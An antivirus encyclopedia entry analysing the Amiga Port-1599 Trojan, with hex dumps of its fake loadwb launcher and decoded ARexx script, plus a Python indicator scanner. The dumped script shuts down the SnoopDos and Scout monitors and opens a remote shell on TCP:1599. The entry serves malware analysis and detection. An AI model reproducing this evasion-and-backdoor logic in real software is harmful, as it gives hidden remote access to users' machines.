Port 1599 Trojan - Amiga Virus Encyclopedia

VIRUS HELP TEAM
Amiga Antivirus Website




     ------------------------
     Amiga Virus Encyclopedia
     Port 1599 Trojan
     ------------------------


     Virus Help Team is looking for this virus; please send it to us

        Port-1599 Trojan (computer takeover)
        An ARexx program
        The encoding routine is identical, byte for byte, to that of the Port-67 Trojan.
        Several files are involved.
        VT offers to delete them. Afterwards, copy the original LoadWB command back into place.


        IMPORTANT !!! IMPORTANT !!!!
        The installer file and/or archive is UNKNOWN. Please
        search with ???
        c:loadwb (fake)              packed:   1192 bytes
                                     unpacked:  748 bytes
        l:startup.handler (the real loadwb)  1136 bytes
        l:background.handler                 1700 bytes
        My opinion: no program without ulterior motives moves a program
        from c: to l: and takes over its name. Once unpacked, the fake loadwb contains the following readable text:
        
        ffdc7000 4e5d4e75 52554e20 3e4e494c ..p.N]NuRUN >NIL
        3a204c3a 6261636b 67726f75 6e642e68 : L:background.h
        616e646c 6572004c 3a737461 72747570 andler.L:startup
        2e68616e 646c6572 00726578 786d6173 .handler.rexxmas
        74004e49 4c3a0000 74ff4e75 4e750000 t.NIL:..t.NuNu..

        What actually happens is that three programs are started via DOS Execute.
        The unencoded part of the background file reads:
        01014e75 24564552 3a204247 48616e64 ..Nu$VER: BGHand
        6c657220 322e3120 2831392e 392e3934 ler 2.1 (19.9.94
        29204368 696c6474 616b206d 616e6167 ) Childtak manag
        656d656e 7420686e 64720a00 ement hndr..
        background.handler contains a multiply-encoded area.

        Created in memory:
        00000043 54455354 313a3b61 64647265 ...CTEST1:;addre
        73732063 6f6d6d61 6e642027 57616974 ss command 'Wait
        20313020 6d696e27 3b3b6966 2073686f  10 min';;if sho
        77282770 272c274d 49414d49 2e312729 w('p','MIAMI.1')
        20746865 6e207369 676e616c 20534e4f then signal SNO
        4f505445 53543b65 6c736520 7369676e OPTEST;else sign
        616c2054 45535432 3b544553 54323a3b al TEST2;TEST2:;
        3b696620 73686f77 28277027 2c27414d ;if show('p','AM
        49544350 27292074 68656e20 7369676e ITCP') then sign
        616c2053 4e4f4f50 54455354 3b656c73 al SNOOPTEST;els
        65207369 676e616c 20544553 54313b53 e signal TEST1;S
        4e4f4f50 54455354 3a3b6966 2073686f NOOPTEST:;if sho
        77282770 272c2753 4e4f4f50 444f5327 w('p','SNOOPDOS'
        29205448 454e2044 4f3b6164 64726573 ) THEN DO;addres
        7320736e 6f6f7064 6f732071 7569743b s snoopdos quit;
        454e443b 7369676e 616c2053 434f5554 END;signal SCOUT
        54455354 3b53434f 55545445 53543a3b TEST;SCOUTTEST:;
        69662073 686f7728 2770272c 2753434f if show('p','SCO
        55542e31 27292054 48454e20 444f3b61 UT.1') THEN DO;a
        64647265 73732073 636f7574 2e312051 ddress scout.1 Q
        5549543b 454e443b 7369676e 616c2050 UIT;END;signal P
        4f52543b 504f5254 3a3b6164 64726573 ORT;PORT:;addres
        7320636f 6d6d616e 64202752 756e203c s command 'Run <
        3e4e494c 3a204e65 77736865 6c6c2054 >NIL: Newshell T
        43503a31 35393927 3b736967 6e616c20 CP:1599';signal
        54455354 313b6578 69740000 TEST1;exit..
    
        An ARexx program: a timed loop, a check for SnoopDos and Scout,
        and a NewShell (on TCP:1599, see the dump above).
        According to third-party statements:
        there are said to have been unauthorized accesses (spying out passwords,
        formatting a partition).
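        As an added example (not part of this entry or of VT), the Python below decodes the hex dumps quoted above and runs a strings(1)-style scan over the recovered bytes, flagging the indicators this entry describes: the launcher chain in the fake loadwb, the commands that shut down SnoopDos and Scout, and the NewShell bound to TCP:1599. The dump lines are copied from this entry; the function names and the INDICATORS selection are assumptions of mine.

```python
import re
HEX_GROUP = re.compile(r"^[0-9a-fA-F]{8}$")

# Dump lines copied from the entry above: first the readable part of the fake
# c:loadwb, then the SCOUTTEST/PORT tail of the in-memory ARexx program.
LOADWB_DUMP = """\
ffdc7000 4e5d4e75 52554e20 3e4e494c ..p.N]NuRUN >NIL
3a204c3a 6261636b 67726f75 6e642e68 : L:background.h
616e646c 6572004c 3a737461 72747570 andler.L:startup
2e68616e 646c6572 00726578 786d6173 .handler.rexxmas
74004e49 4c3a0000 74ff4e75 4e750000 t.NIL:..t.NuNu..
"""
AREXX_TAIL_DUMP = """\
69662073 686f7728 2770272c 2753434f if show('p','SCO
55542e31 27292054 48454e20 444f3b61 UT.1') THEN DO;a
64647265 73732073 636f7574 2e312051 ddress scout.1 Q
5549543b 454e443b 7369676e 616c2050 UIT;END;signal P
4f52543b 504f5254 3a3b6164 64726573 ORT;PORT:;addres
7320636f 6d6d616e 64202752 756e203c s command 'Run <
3e4e494c 3a204e65 77736865 6c6c2054 >NIL: Newshell T
43503a31 35393927 3b736967 6e616c20 CP:1599';signal
54455354 313b6578 69740000 TEST1;exit..
"""

# Indicators taken from the entry (my selection): the launcher chain inside the
# fake loadwb, the SnoopDos/Scout shutdown commands and the shell on TCP:1599.
INDICATORS = ("L:background.handler", "L:startup.handler", "rexxmast",
              "address snoopdos quit", "address scout.1 QUIT", "Newshell TCP:1599")

def dump_to_bytes(dump: str) -> bytes:
    """Decode up to four 8-digit hex groups per line. The ASCII column is only a
    rendering of those bytes and is ignored."""
    out = bytearray()
    for line in dump.splitlines():
        groups = []
        for tok in line.split():
            if len(groups) == 4 or not HEX_GROUP.match(tok):
                break
            groups.append(tok)
        out += bytes.fromhex("".join(groups))
    return bytes(out)

def strings(data: bytes, min_len: int = 4) -> list:
    """Printable-ASCII runs of at least min_len bytes, like strings(1)."""
    return [m.decode("ascii") for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]

def matched_indicators(dump: str) -> list:
    """Return the entries of INDICATORS that occur in the decoded dump."""
    text = "\n".join(strings(dump_to_bytes(dump)))
    return [ioc for ioc in INDICATORS if ioc in text]
```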
        
        Addendum 98-03-05:
        I have received several e-mails. Port 1599 seems to have been known to
        "insiders" for some time. The corresponding
        Amiga programs are now said to allow defensive entries.
        See also: Port-67 Trojan


     Original test by Heiner Schneegold
     Translated from German to English by Google Translate
     


     


Virus Help Team
Denmark & Canada
Copyright © All rights reserved
www.vht.dk